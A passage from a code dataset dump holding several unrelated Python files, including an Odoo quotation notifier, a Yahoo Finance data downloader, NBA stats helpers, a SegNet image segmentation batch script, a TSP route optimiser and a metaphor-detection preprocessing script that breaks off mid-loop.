{} days.\"\n pref_subject = \"{}: Quotation has no activity for {} days.\"\n pref_body = \"Get an update for Quotation {}\"\n if days_inactivity >= quotation.days_without_activity:\n # Generate notification\n quotation.notification_has_been_generated = True\n msg = pref_msg.format(quotation.name, str(days_inactivity))\n\n group = quotation.group_to_be_notified\n recipient_partners = list()\n for recipient in group.users:\n recipient_partners.append((4, recipient.partner_id.id))\n\n new_context = {'thread_model':'sale.order'}\n post_vars = {\n 'subject': pref_subject.format(quotation.name, quotation.days_without_activity),\n 'body': pref_body.format(quotation.name),\n 'partner_ids': recipient_partners,\n 'model' : 'sale.order',\n 'res_id' : quotation.id,\n }\n\n thread_pool = self.pool.get('mail.thread')\n thread_pool.message_post(\n self.env.cr,\n self.env.uid,\n quotation.id,\n type=\"notification\",\n subtype=\"mt_comment\",\n context=new_context,\n **post_vars\n )\n","sub_path":"quotation_notifier/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52657457","text":"from pandas._libs.tslibs.timestamps import Timestamp\nimport yfinance as yf\nimport pandas as pd\nimport argparse\nimport datetime\nimport logging\nimport pprint\nimport json\nimport sys\nimport os\n\n\n\ndef initArgparse() -> argparse.ArgumentParser:\n def make_wide(formatter, w=120, h=36):\n \"\"\"Return a wider HelpFormatter, if possible.\"\"\"\n try:\n # https://stackoverflow.com/a/5464440\n kwargs = {'width': w, 'max_help_position': h}\n formatter(None, **kwargs)\n return lambda prog: formatter(prog, **kwargs)\n except TypeError:\n return formatter\n\n parser = argparse.ArgumentParser(\n usage=\"%(prog)s [OPTIONS]...\",\n description=\"Fetches historical data for strategies' backtests\",\n formatter_class=make_wide(argparse.HelpFormatter, w=80, h=20)\n )\n\n parser.add_argument(\n \"-v\", \"--version\", action=\"version\",\n version=f\"{parser.prog} version 1.0.0\"\n )\n\n loglevels = [\"DEBUG\", \"INFO\", \"WARN\", \"ERROR\", \"FATAL\"]\n parser.add_argument(\n \"-l\", \"--loglevel\", metavar=\"LOGLEVEL\",\n default=\"INFO\", choices=loglevels,\n help=f\"Set LOGLEVEL{loglevels} [default='INFO']\"\n )\n\n def getDefultConfigFilename():\n return os.path.splitext(sys.argv[0])[0] + \".json\"\n\n defaultConfig = getDefultConfigFilename()\n parser.add_argument(\n \"-c\", \"--config\", default=defaultConfig,\n help=f\"Set configuration [default={defaultConfig}]\"\n )\n\n parser.add_argument(\n \"-f\", \"--force\", action='count', default=0,\n help=\"Overwrite existing data files [default=(skip download if the file exists)]\"\n )\n\n parser.add_argument(\n \"-d\", \"--dryrun\", action='store_true', default=False,\n help=\"Read config and validate target folders but don't download any data\"\n )\n\n return parser\n\nclass ConfigError(Exception):\n pass\n\ndef parseConfig(configJson):\n\n def collectSymbolsConfig(configJson) -> dict:\n\n def collectSymbolConfigParams(configSectionName, paramsJson) -> dict:\n params = {}\n currentDate = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n if \"period\" in paramsJson:\n periodJson = paramsJson[\"period\"]\n\n if \"start\" in periodJson:\n start = datetime.datetime.strptime(periodJson[\"start\"], \"%Y-%m-%d\")\n else:\n raise ConfigError(f\"[{configSectionName}] Config doesn't have mandatory 'period.start' field\")\n if start >= currentDate:\n raise ConfigError(f\"[{configSectionName}] Config start[{start}] must be before current date[{currentDate}]\")\n\n if \"end\" in periodJson:\n end = datetime.datetime.strptime(periodJson[\"end\"], \"%Y-%m-%d\")\n if start < end:\n params[\"period\"] = {\"start\" : start, \"end\" : end}\n elif start == end:\n raise ConfigError(f\"[{configSectionName}] Config period start[{start}] == end[{end}]\")\n else:\n logging.warn(f\"[{configSectionName}] Config period start[{start}] > end[{end}]. Fixing it by swapping 2 values\")\n params[\"period\"] = {\"start\" : end, \"end\" : start}\n else:\n params[\"period\"] = {\"start\" : start, \"end\" : currentDate}\n\n params[\"symbols\"] = paramsJson.get(\"symbols\", [])\n\n if len(params[\"symbols\"]) and not \"period\" in params:\n raise ConfigError(f\"[{configSectionName}] Config has symbols but doesn't have period. Please specify period (or remove symbols)\")\n if not len(params[\"symbols\"]) and \"period\" in params:\n raise ConfigError(f\"[{configSectionName}] Config doesn't have symbols but has period. Please specify symbols (or remove period)\")\n\n return params\n\n def mergeSymbolsConfig(symbolsConfig, params) -> dict:\n newPeriod = params[\"period\"]\n for symbol in params[\"symbols\"]:\n if symbol in symbolsConfig:\n existingPeriod = symbolsConfig[symbol][\"period\"]\n symbolsConfig[symbol] = {\n \"period\": {\n \"start\" : min(existingPeriod[\"start\"], newPeriod[\"start\"]),\n \"end\" : max(existingPeriod[\"end\"], newPeriod[\"end\"])\n }\n }\n else:\n symbolsConfig[symbol] = {\"period\" : newPeriod}\n\n symbolsConfig = {}\n configSectionName = \"TopLevel\"\n globalParams = collectSymbolConfigParams(configSectionName, configJson)\n mergeSymbolsConfig(symbolsConfig, globalParams)\n if \"strategy\" in configJson:\n for stratJson in configJson[\"strategy\"]:\n configSectionName = stratJson.get(\"name\", \"UnknownStrat\")\n stratParams = collectSymbolConfigParams(configSectionName, stratJson)\n if len(stratParams[\"symbols\"]):\n mergeSymbolsConfig(symbolsConfig, stratParams)\n else:\n logging.warn(f\"[{configSectionName}] Config doesn't have symbols. This section will be skipped\")\n\n if not len(symbolsConfig):\n logging.warn(\"Config doesn't have symbols. Nothing to download\")\n\n return symbolsConfig\n\n def collectInterval(configJson) -> str:\n if \"interval\" in configJson:\n interval = configJson[\"interval\"]\n acceptedIntervals = [\"1h\",\"1d\"]\n if interval not in acceptedIntervals:\n raise ConfigError(\"[TopLevel] Config 'interval' field recognized values: {acceptedIntervals}, however '{interval}' found\")\n return interval\n else:\n raise ConfigError(\"[TopLevel] Config must contain 'interval' field, possible values : {acceptedIntervals}\")\n\n def collectFolder(configJson) -> str:\n if \"folder\" in configJson:\n return configJson[\"folder\"]\n else:\n raise ConfigError(\"[TopLevel] Config must contain 'folder' field\")\n\n symbolsFetchConfig = {\n \"symbols\" : collectSymbolsConfig(configJson),\n \"interval\" : collectInterval(configJson),\n \"folder\" : collectFolder(configJson)\n }\n\n return symbolsFetchConfig\n\n\ndef fetchData(args) -> None:\n logging.info(f\"Loading configuration from file : {args.config}\")\n with open(args.config) as configFile:\n baseDir = os.path.dirname(os.path.abspath(args.config))\n logging.debug(f\"Config folder : {baseDir}\")\n\n config = json.load(configFile)\n symbolsFetchConfig = parseConfig(config)\n logging.debug(f\"Use parsed config to fetch symbol data:\\n{pprint.pformat(symbolsFetchConfig)}\")\n\n def prepareFolder(baseDir, folder):\n if not os.path.isabs(folder):\n folder = os.path.normpath(os.path.join(baseDir, folder))\n if os.path.exists(folder):\n if not os.path.isdir(folder):\n raise Exception(f\"Path {folder} exists but it's not a folder. Please review your data folder strurcture\")\n else:\n logging.info(f\"Folder {folder} doesn't exist. Creating it...\")\n os.mkdir(folder)\n return folder\n \n symbolFolder = prepareFolder(baseDir, symbolsFetchConfig[\"folder\"])\n\n for symbol, symbolConfig in symbolsFetchConfig[\"symbols\"].items():\n symbolFilename = symbol.lower() + \".zip\"\n symbolPath = os.path.join(symbolFolder, symbolFilename)\n symbolStart = symbolConfig[\"period\"][\"start\"]\n symbolEnd = symbolConfig[\"period\"][\"end\"]\n interval = symbolsFetchConfig[\"interval\"]\n\n if os.path.exists(symbolPath):\n if not os.path.isfile(symbolPath):\n raise Exception(f\"Target symbol {symbol} path is not a regular file: {symbolPath}. Please review your data folder structure\")\n df = pd.read_csv(symbolPath, names=[\"Date\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\"])\n logging.debug(f\"First line :\\n{df.head(1)}\")\n logging.debug(f\"File dates : [{df.iloc[0]['Date']},{df.iloc[-1]['Date']}]\")\n fileStart = datetime.datetime.strptime(df.iloc[0]['Date'], \"%Y%m%d %H:%M\")\n fileEnd = datetime.datetime.strptime(df.iloc[-1]['Date'], \"%Y%m%d %H:%M\")\n\n isIncompleteDataFile = symbolStart < fileStart or fileEnd < symbolEnd\n if isIncompleteDataFile:\n shouldReplaceExistingFile = args.force > 0\n logMsg = (\n f\"Symbol {symbol} file exists : {symbolPath}. \"\n f\"However it doesn't contain required historical period. \"\n f\"File dates [{fileStart},{fileEnd}]. \"\n f\"Configured dates [{symbolStart},{symbolEnd}].\")\n else:\n shouldReplaceExistingFile = args.force > 1\n logMsg = (\n f\"Symbol {symbol} file exists : {symbolPath}. \"\n f\"It contains larger period of histrocal data. \"\n f\"File dates [{fileStart},{fileEnd}]. \"\n f\"Configured dates [{symbolStart},{symbolEnd}].\")\n\n if not shouldReplaceExistingFile:\n requiredForce = \"-f\" if isIncompleteDataFile else \"-ff\"\n logMsg += f\" Skipping symbol download (you can use {requiredForce} to enforce it).\"\n if isIncompleteDataFile:\n logging.info(logMsg)\n else:\n logging.debug(logMsg)\n continue\n else:\n shouldReplaceExistingFile = False\n\n def symbolEndAdjustment(interval):\n # This adjustment is required because:\n # 1) Yahoo Finance interpret \"end\" as open range, i.e. [start,end);\n # 2) Next day (or hour) may not be tradable so we need to more than 1 day or 1 hour\n if interval == \"1d\":\n return datetime.timedelta(days=7)\n elif interval == \"1h\":\n return datetime.timedelta(days=1, hours=1)\n else:\n raise Exception(f\"Uknonwn interval {interval}\")\n\n symbolEnd += symbolEndAdjustment(interval)\n\n logging.info(f\"Downloading {symbol} : {symbolStart} : {symbolEnd}\")\n logging.getLogger().handlers[0].flush()\n df = yf.download(\n symbol,\n start=symbolStart,\n end=symbolEnd,\n interval=interval,\n auto_adjust = True\n )\n print(\"Done\")\n sys.stdout.flush()\n\n def yahooFinanceDateToQuantConnect(yfDate : Timestamp) -> str:\n # 2021-06-30 -> 20210630 00:00\n return yfDate.strftime(\"%Y%m%d %H:%M\")\n def yahooFinanceNumToQuantConnect(yfNum : float) -> int:\n # 427.209991 -> 4272099\n return int(yfNum * 10000)\n logging.debug(f\"Got data\\n{df.head(2)}\\n...\")\n df.reset_index(level=0, inplace=True)\n\n # I use df.columns[0] instead of \"Date\" because yfinance doesn't always return the same name of the field for different intervals\n df[\"QCDate\"] = df[df.columns[0]].transform(yahooFinanceDateToQuantConnect)\n df[\"QCOpen\"] = df[\"Open\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCHigh\"] = df[\"High\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCLow\"] = df[\"Low\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCClose\"] = df[\"Close\"].transform(yahooFinanceNumToQuantConnect)\n\n logging.debug(f\"convert data format\\n{df[['QCDate', 'QCOpen', 'QCHigh', 'QCLow', 'QCClose', 'Volume']].head(1)}\")\n\n downloadSymbolPath = symbolPath + \".download\"\n csvFileName = symbol.lower() + \".csv\"\n df[['QCDate', 'QCOpen', 'QCHigh', 'QCLow', 'QCClose', 'Volume']].to_csv(\n downloadSymbolPath,\n index=False,\n header=False,\n compression={\n \"method\" : 'zip',\n \"archive_name\" : csvFileName\n }\n )\n if shouldReplaceExistingFile:\n os.replace(downloadSymbolPath, symbolPath)\n else:\n os.rename(downloadSymbolPath, symbolPath)\n logging.info(\"Data fetch is completed\")\n\n\ndef main() -> None:\n parser = initArgparse()\n args = parser.parse_args()\n\n logging.basicConfig(format=\"%(asctime)s %(levelname)-4s %(message)s\", level=logging.getLevelName(args.loglevel), datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n fetchData(args)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"src/strategy/fetchData.py","file_name":"fetchData.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25422681","text":"# -*- coding: utf-8 -*-\n__author__ = 'jack'\n\nclass Solution:\n def preorder(self, root):\n res = []\n return self.helper(root, res)\n\n def helper(self, root, traverse):\n if root:\n traverse.append(root.val)\n if root.children:\n for child in root.children:\n self.helper(child, traverse)\n return traverse","sub_path":"Week_02/589.n_ary_tree_preorder_traversal.py","file_name":"589.n_ary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"378807182","text":"#\n# anova_feature_selection.py\n#\n# z katalogu --input-dir\n# trzy pliki: train_data.pkl, test_data.pkl, class_names.pkl\n#\n# Uczy się na danych z train_data.pkl wyliczając ANOVA i wybierając k-najlepszych cech\n# To same cechy wybiera z train_data.pkl\n# Wynik zapisywany jest do --output-dir\n\n# UWAGA zarówno output- jak i input-dir wpisujemy z '\\' (na windowsie) lub '/' (na Linuxie) na końcu ścieżki\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n# from sklearn.manifold import TSNE\n# from sklearn import decomposition\nfrom sklearn.feature_selection import SelectKBest, f_classif\n# from sklearn import datasets, metrics\n# from sklearn.manifold import TSNE\nfrom sklearn.metrics import classification_report\n\nimport time\nimport argparse\n\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# from sklearn.naive_bayes import GaussianNB\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn.svm import SVC\n\n\ndef read_data(input_dir):\n # wczytujemy dane treningowe:\n train_data_infile = open(input_dir + 'train_data.pkl', 'rb') # czytanie z pliku\n data_train_all_dict = pickle.load(train_data_infile)\n\n x_train = data_train_all_dict[\"data\"]\n y_train = data_train_all_dict[\"classes\"]\n\n # wczytujemy dane testowe:\n test_data_infile = open(input_dir + 'test_data.pkl', 'rb') # czytanie z pliku\n data_test_all_dict = pickle.load(test_data_infile)\n\n x_test = data_test_all_dict[\"data\"]\n\n y_test = data_test_all_dict[\"classes\"]\n\n # i nazwy klas\n cl_names_infile = open(input_dir + 'class_names.pkl', 'rb')\n classes_names = pickle.load(cl_names_infile)\n\n print(\"Data loaded from \" + input_dir)\n\n return x_train, y_train, x_test, y_test, classes_names\n\n\ndef save_data(x_train, y_train, x_test, y_test, classes_names, output_dir):\n # zapisujemy dane treningowe\n x_train_all_dict = {'data': x_train,\n 'classes': y_train}\n\n train_data_outfile = open(output_dir + 'train_data.pkl', 'wb')\n pickle.dump(x_train_all_dict, train_data_outfile)\n\n # zapisujemy dane testowe\n x_test_all_dict = {'data': x_test,\n 'classes': y_test}\n\n test_data_outfile = open(output_dir + 'test_data.pkl', 'wb')\n pickle.dump(x_test_all_dict, test_data_outfile)\n\n # zapisujemy nazwy klas\n cl_names_outfile = open(output_dir + 'class_names.pkl', 'wb')\n pickle.dump(classes_names, cl_names_outfile)\n\n print(\"Pickles saved in \", output_dir)\n\n\ndef ParseArguments():\n parser = argparse.ArgumentParser(description=\"Project\")\n parser.add_argument('--input-dir', default=\"\", required=True, help='data dir (default: %(default)s)')\n parser.add_argument('--output-dir', default=\"\", required=True, help='output dir (default: %(default)s)')\n parser.add_argument('--n', default=\"\", required=True, help='output dir (default: %(default)s)')\n args = parser.parse_args()\n\n return args.input_dir, args.output_dir, args.n\n\n\ninput_dir, output_dir, n_comp = ParseArguments()\n\nn_comp = int(n_comp)\n\n# wczytujemy dane\nx_train, y_train, x_test, y_test, classes_names = read_data(input_dir)\n\n###ANOVA\n\nprint(\"ANOVA reduction \", x_train.shape[1], \" -> \", n_comp, \" ...\", end =\" \")\n\nanova_filter = SelectKBest(f_classif, k=n_comp)\n\n## wwybranie odpowiednich cech na podstawie wyliczeń wykonanych na x_train\nstart_time = time.time()\nx_train_reduced = anova_filter.fit_transform(x_train, y_train)\nprint(\" took %s seconds \" % round((time.time() - start_time),5))\n\n# wybranie tych samych cech z x_test\n\nx_test_reduced = anova_filter.transform(x_test)\n\n\n# zapisujemy dane\n\nsave_data(x_train_reduced, y_train, x_test_reduced, y_test, classes_names, output_dir)\n","sub_path":"scripts/z6_anova_feature_selection.py","file_name":"z6_anova_feature_selection.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"612780373","text":"import os\nimport sys\nimport shutil\nimport tempfile\nfrom os.path import dirname, isdir, realpath\n\n\ndef _convert_path(path):\n \"\"\"Given a Unix path, convert it for the current platform.\n \"\"\"\n return os.sep.join(path.split('/'))\n\n\ndef _convert_paths(paths):\n \"\"\"Given a tuple of Unix paths, convert them for the current platform.\n \"\"\"\n return tuple([_convert_path(p) for p in paths])\n\n\ndef _get_tempdir():\n \"\"\"Return a temporary directory we can use for our fixture.\n \"\"\"\n return os.path.realpath(os.path.join(tempfile.gettempdir(), 'fsfix'))\n\n\nclass Mk(object):\n\n def __init__(self, root=None):\n self.root = root if root is not None else _get_tempdir()\n self.cwd = None # set in __call__\n self.teardown() # start clean\n\n\n def __call__(self, *treedef):\n \"\"\"Given a treedef, build a filesystem fixture in self.root.\n\n treedef is a sequence of strings and tuples. If a string, it is interpreted\n as a path to a directory that should be created. If a tuple, the first\n element is a path to a file, the second is the contents of the file. We do\n it this way to ease cross-platform testing.\n\n \"\"\"\n self.cwd = os.getcwd()\n os.mkdir(self.root)\n os.chdir(self.root)\n for item in treedef:\n if isinstance(item, basestring):\n path = _convert_path(item.lstrip('/'))\n path = os.sep.join([self.root, path])\n os.makedirs(path)\n elif isinstance(item, tuple):\n filepath, contents = item\n path = _convert_path(filepath.lstrip('/'))\n path = os.sep.join([self.root, path])\n parent = dirname(path)\n if not isdir(parent):\n os.makedirs(parent)\n file(path, 'w').write(contents)\n\n\n def teardown(self):\n \"\"\"Roll back fixture.\n\n - reset the current working directory\n - remove self.root from the filesystem\n - remove self.root from sys.path\n\n \"\"\"\n if self.cwd is not None:\n os.chdir(self.cwd)\n self.remove()\n while self.root in sys.path:\n sys.path.pop(self.root)\n\n tear_down = tearDown = teardown\n\n\n def resolve(self, path=''):\n \"\"\"Given a relative path, return an absolute path under self.root.\n\n The incoming path is in UNIX form (/foo/bar.html). The outgoing path is in\n native form, with symlinks removed.\n\n \"\"\"\n path = os.sep.join([self.root] + path.split('/'))\n return realpath(path)\n\n\n def remove(self):\n \"\"\"Remove the filesystem fixture at self.root.\n \"\"\"\n if isdir(self.root):\n shutil.rmtree(self.root)\n","sub_path":"fsfix.py","file_name":"fsfix.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101731172","text":"from nba_api.stats.endpoints import leaguegamefinder, playergamelog, playernextngames, commonplayerinfo, playercareerstats\nfrom nba_api.stats.static import players, teams\n\nnba_players = players.get_players()\nnba_teams = teams.get_teams()\n\n\ndef get_player_info(player_id):\n commoninfo = commonplayerinfo.CommonPlayerInfo(player_id=player_id)\n\n return {'commoninfo': commoninfo.get_dict()}\n\n\ndef get_player_stats(player_id, season_year, season_type):\n career = playercareerstats.PlayerCareerStats(\n player_id=player_id, per_mode36='Totals')\n\n season = career.get_dict()\n season_stats = season['resultSets'][0]['rowSet'][-1]\n\n ppg = season_stats[26] / season_stats[6]\n ast = season_stats[21] / season_stats[6]\n reb = season_stats[20] / season_stats[6]\n\n return {'careerstats': season, 'PTS': \"{:.1f}\".format(ppg), 'AST': \"{:.1f}\".format(ast), 'REB': \"{:.1f}\".format(reb)}\n\n\ndef get_ids(player_name, team_name):\n player_info = [\n player for player in nba_players if player['full_name'] == player_name][0]\n player_id = player_info['id']\n\n team_info = [\n team for team in nba_teams if team['abbreviation'] == team_name][0]\n team_id = team_info['id']\n\n return {'player_id': player_id, 'team_id': team_id}\n\n\ndef get_games(player_id, season_year, season_type):\n game = playergamelog.PlayerGameLog(\n player_id=player_id, season=season_year, season_type_all_star=season_type)\n\n next_game = playernextngames.PlayerNextNGames(\n number_of_games=\"1\", player_id=player_id, season_all=season_year, season_type_all_star=season_type)\n\n return {'game': game.get_dict(), 'nextgame': next_game.get_dict()}\n","sub_path":"info/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"628766206","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport caffe\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os.path\nimport json\nimport scipy\nimport argparse\nimport math\nimport pylab\nfrom skimage import io\nfrom sklearn.preprocessing import normalize\nimport csv\nimport os\nfrom collections import Counter\n\n\n# In[ ]:\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, required=True, help=':the url of your model file')\nparser.add_argument('--weights', type=str, required=True, help=':the url of your weights file')\nparser.add_argument('--img_list_root', type=str, required=True, help=\":the original iamges' folder\")\nparser.add_argument('--output_csv', type=str, required=True, help=':where you want to output csv file')\nparser.add_argument('--output_image_root', type=str, required=True, help='where you want to output classified image files')\nargs = parser.parse_args()\nargs.img_list_root = args.img_list_root+'/'\nargs.output_image_root = args.output_image_root+'/'\n\n# model = '/home/bigdata/caffe-segnet/Segnet/Example_Models/segnet_model_driving_webdemo.prototxt'\n# weights = '/home/bigdata/caffe-segnet/Segnet/Models/caffemodel/segnet_weights_driving_webdemo.caffemodel'\n# img_list_root = '/home/bigdata/caffe-segnet/Segnet/testdata/'\n# output_csv_root = '/home/bigdata/temp.csv'\n# output_classified_image_root = '/home/bigdata/caffe-segnet/Segnet/temp/'\n\n\n# In[ ]:\n\n\n# initialize the net\nnet = caffe.Net(args.model, args.weights, caffe.TEST)\n\n\n# In[ ]:\n\n\n# fit the picture for caffe\ntransformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})\ntransformer.set_transpose('data', (2,0,1))\ntransformer.set_raw_scale('data', 255)\ntransformer.set_channel_swap('data', (2,1,0))\n\n\n# In[ ]:\n\n\n# define the colour of each class and the label_colours which index correspond with the class name\nSky = [128,128,128]\nBuilding = [128,0,0]\nPole = [192,192,128]\nRoad_marking = [255,69,0]\nRoad = [128,64,128]\nPavement = [60,40,222]\nTree = [128,128,0]\nSignSymbol = [192,128,128]\nFence = [64,64,128]\nCar = [64,0,128]\nPedestrian = [64,64,0]\nBicyclist = [0,128,192]\nRoad_Marking = [0,0,0]\nlabel_colours = np.array([Sky, Building, Pole, Road_Marking, Road, Pavement, Tree, SignSymbol, Fence, Car, Pedestrian, Bicyclist])\n\n\n# In[ ]:\n\n\n# defien a list to store all image root\nimage_name_list = os.listdir(args.img_list_root)\ncsv_content = []\nimage_root_list = []\nfor name in image_name_list:\n image_root_list.append(args.img_list_root+name)\n csv_content.append([name.split('_')[1], name.split('_')[2], name.split('_')[3]])\n\n\n# In[ ]:\n\n\n# pocess for each image\nfor index, each_image in enumerate(image_root_list):\n net = caffe.Net(args.model, args.weights, caffe.TEST)\n im = caffe.io.load_image(each_image)\n net.blobs['data'].data[...] = transformer.preprocess('data', im)\n print('image - '+repr(each_image)+' is processing....')\n out = net.forward()\n predicted = net.blobs['argmax'].data\n ind = np.squeeze(predicted[0,:,:,:])\n ind_temp = np.reshape(ind, -1)\n ind_dic = Counter(ind_temp.tolist())\n # ----------------------------------------------\n # the code blow is used for save classified image \n r = ind.copy()\n b = ind.copy()\n g = ind.copy()\n for l in range(0,11):\n r[ind == l] = label_colours[l, 0]\n g[ind == l] = label_colours[l, 1]\n b[ind == l] = label_colours[l, 2]\n rgb = np.zeros((ind.shape[0], ind.shape[1], 3))\n rgb[:,:,0] = r/255.0\n rgb[:,:,1] = g/255.0\n rgb[:,:,2] = b/255.0\n io.imsave(args.output_image_root+repr(index)+'.jpg',rgb)\n # ----------------------------------------------\n for each_class in range(12):\n if each_class in ind_dic.keys():\n csv_content[index].append(ind_dic[each_class])\n else:\n csv_content[index].append(0)\n print('image - ', index, ' process finished....')\n\n\n# In[ ]:\n\n\n# write the content into csv file\nwith open(args.output_csv, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(csv_content)\n\n","sub_path":"batch_segmentation.py","file_name":"batch_segmentation.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4718494","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport pandas as pd\nimport plotly.figure_factory as ff\nfrom geopy.geocoders import Nominatim\nimport datetime\n\nlt=pd.read_csv('export.csv', sep=';', \n error_bad_lines=False,header=None)\nlt.head()\nlt.fillna(0)\nfor c in [1,2,3]:\n lt[c]=lt[c].str.strip().str.lower()\nlt[5]=lt[5].str.strip().replace('(', '').replace(')', '')\n\nlt[0]=pd.to_datetime(lt[0])\n#lt=lt[(lt[0].dt.year==2018)&(lt[0] =datetime.date(2018, slider[0] ,1)) & (lt[0]=datetime.date(2018, slider[0] ,1)) & (lt[0]=datetime.date(2018, slider[0] ,1)) & (lt[0]\", places[finalPath[i]], end = \"\")\n subdest.append(places[finalPath[i]])\n \n # TSP optimization using mip\n else:\n model = Model()\n x = [[model.add_var(var_type=BINARY) for j in V] for i in V]\n y = [model.add_var() for i in V]\n\n # objective function: minimize the distance\n model.objective = minimize(xsum(c[i][j]*x[i][j] for i in V for j in V))\n\n # constraint : leave each point only once\n for i in V:\n model += xsum(x[i][j] for j in V - {i}) == 1\n\n # constraint : enter each point only once\n for i in V:\n model += xsum(x[j][i] for j in V - {i}) == 1\n\n # subtour elimination\n for (i, j) in product(V - {n}, V - {n}):\n if i != j:\n model += y[i] - (n+1)*x[i][j] >= y[j]-n\n\n # optimizing\n status = model.optimize(max_seconds=30)\n print(status)\n\n print(\"=========================================================\")\n print(\"Tour\", str(tour+1), \":\")\n print(\"Subgraph Matrix:\")\n printMatrix(c, dest)\n print(\"\")\n\n # checking if a solution was found\n if model.num_solutions:\n print('route with total distance found: ', model.objective_value)\n print(startCity, end = \"\")\n nc = n\n subdest = []\n while True:\n nc = [i for i in V if x[nc][i].x >= 0.99][0]\n print(\" ->\", places[nc], end = \"\")\n subdest.append(places[nc])\n if nc == n:\n break \n else:\n print(model.objective_bound) \n\n print(\"\")\n print(\"\")\n\n # visualize the graph\n visualize(G, startCity, subdest, nodes, tour)\n\n plt.show()\n\n\ndef eucledian(point1, point2):\n return (math.sqrt((point1.x-point2.x)**2 + (point1.y-point2.y)**2))","sub_path":"src/mtsp.py","file_name":"mtsp.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499559151","text":"from util import get_num_lines, get_pos2idx_idx2pos, index_sequence, get_vocab, embed_indexed_sequence, \\\n get_word2idx_idx2word, get_embedding_matrix, write_predictions, get_performance_VUAverb_val\nfrom util import TextDatasetWithGloveElmoSuffix as TextDataset\nfrom util import evaluate\nfrom model import RNNSequenceModel\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport csv\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\nprint(\"PyTorch version:\")\nprint(torch.__version__)\nprint(\"GPU Detected:\")\nprint(torch.cuda.is_available())\nusing_GPU = True\n\n\"\"\"\n1. Data pre-processing\n\"\"\"\n\n'''\n1.2 TroFi\nget raw dataset as a list:\n Each element is a triple:\n a sentence: string\n a index: int: idx of the focus verb\n a label: int 1 or 0\n'''\nraw_trofi = []\n\nwith open('../data/TroFi/TroFi_formatted_all3737.csv') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n sentence = line[1]\n label_seq = [0] * len(sentence.split())\n pos_seq = [0] * len(label_seq)\n verb_idx = int(line[2])\n verb_label = int(line[3])\n label_seq[verb_idx] = verb_label\n pos_seq[verb_idx] = 1 # idx2pos = {0: 'words that are not focus verbs', 1: 'focus verb'}\n raw_trofi.append([sentence.strip(), label_seq, pos_seq])\n\n\nprint('TroFi dataset division: ', len(raw_trofi))\n\n\n\n\"\"\"\n2. Data preparation\n\"\"\"\n'''\n2. 1\nget vocabulary and glove embeddings in raw dataset \n'''\n# vocab is a set of words\nvocab = get_vocab(raw_trofi)\n# two dictionaries. : 0, : 1\nword2idx, idx2word = get_word2idx_idx2word(vocab)\n# glove_embeddings a nn.Embeddings\nglove_embeddings = get_embedding_matrix(word2idx, idx2word, normalization=False)\n# elmo_embeddings\n# set elmos_trofi=None to exclude elmo vectors. Also need to change the embedding_dim in later model initialization\nelmos_trofi = h5py.File('../elmo/TroFi3737.hdf5', 'r')\n\n\n'''\n2. 2\nembed the datasets\n'''\nrandom.seed(0)\nrandom.shuffle(raw_trofi)\n\n# second argument is the post sequence, which we don't need\nembedded_trofi = [[embed_indexed_sequence(example[0], example[2], word2idx,\n glove_embeddings, elmos_trofi, None),\n example[2], example[1]]\n for example in raw_trofi]\n\n\n\n'''\n2. 3 10-fold cross validation\n'''\n# separate the embedded_sentences and labels into 2 list, in order to pass into the TextDataset as argument\nsentences = [example[0] for example in embedded_trofi]\nposs = [example[1] for example in embedded_trofi]\nlabels = [example[2] for example in embedded_trofi]\n# ten_folds is a list of 10 tuples, each tuple is (list_of_embedded_sentences, list_of_corresponding_labels)\nten_folds = []\nfold_size = int(3737 / 10)\nfor i in range(10):\n ten_folds.append((sentences[i * fold_size:(i + 1) * fold_size],\n poss[i * fold_size:(i + 1) * fold_size],\n labels[i * fold_size:(i + 1) * fold_size]))\n\nidx2pos = {0: 'words that are not focus verbs', 1: 'focus verb'}\n\noptimal_f1s = []\noptimal_ps = []\noptimal_rs = []\noptimal_accs = []\npredictions_all = []\nfor i in range(10):\n '''\n 2. 3\n set up Dataloader for batching\n '''\n training_sentences = []\n training_labels = []\n training_poss = []\n for j in range(10):\n if j != i:\n 